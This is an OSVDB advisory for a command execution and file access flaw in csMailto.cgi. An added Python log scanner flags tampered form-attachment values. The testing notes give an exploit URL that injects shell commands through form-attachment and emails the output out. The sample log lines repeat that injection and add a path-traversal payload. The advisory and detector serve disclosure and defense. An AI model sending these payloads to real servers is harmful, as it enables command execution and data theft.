csMailto.cgi Arbitrary File Access

2002-04-23T00:00:00
ID OSVDB:6505
Type osvdb
Reporter Steve Gustin (stegus1@yahoo.com)
Modified 2002-04-23T00:00:00

Description

Vulnerability Description

csMailto.cgi contains a flaw that may allow a malicious user to access arbitrary files on the server. The issue is triggered when a hidden form field value is modified. It is possible that the flaw may allow execution of arbitrary commands on the system resulting in a loss of confidentiality.

Solution Description

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

Execute a command on the server and mail the output to any address:

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform
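Added example (not part of the original entry or the vendor's code): a log check that flags csMailto.cgi requests whose form-attachment value has been tampered with. It assumes combined-format access logs and a site-defined allowlist of attachment names; the function names, the allowlist entry and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SCRIPT = "csmailto.cgi"          # matched case-insensitively
FIELD = "form-attachment"        # keyword named in the advisory
SHELL_META = set("|;&`$<>\r\n")
ALLOWED_ATTACHMENTS = {"brochure.pdf"}  # assumption: names the site's own forms send

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(log_line):
    """Return the reasons a log line is suspicious (empty list if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if url.path.rsplit("/", 1)[-1].lower() != SCRIPT:
        return []
    reasons = []
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() != FIELD:
            continue
        value = decode_fully(raw)
        if SHELL_META & set(value):
            reasons.append("shell-metacharacter")
        if value.startswith("/") or ".." in value.replace("\\", "/").split("/"):
            reasons.append("path-outside-form-dir")
        if value not in ALLOWED_ATTACHMENTS:
            reasons.append("not-allowlisted")
    return reasons

# Constructed sample lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/csMailto.cgi?command=mailform&form-attachment=brochure.pdf HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/CSMailto.cgi?form-attachment=PLACEHOLDER%7C&Email=user@host.com&form-autoresponse=YES&command=mailform HTTP/1.0" 200 87',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/csmailto.cgi?Form-Attachment=..%252F..%252Fconf%252Fsite.cfg&command=mailform HTTP/1.1" 200 87',
]

def scan(lines):
    """Map line index -> reasons, for lines with at least one finding."""
    return {i: r for i, line in enumerate(lines) if (r := findings(line))}
```

Access logs only record the query string, so a form-attachment value submitted in a POST body is invisible to this check; the same logic has to run where request bodies can be inspected.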

References:

Vendor URL: http://www.cgiscript.net/
Vendor Specific Advisory URL
Snort Signature ID: 2194
Related OSVDB ID: 6504
Related OSVDB ID: 6506
Related OSVDB ID: 6507
Nessus Plugin ID: 11748
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-04/0326.html
Keyword: form-attachment
ISS X-Force ID: 9804
CVE-2002-0750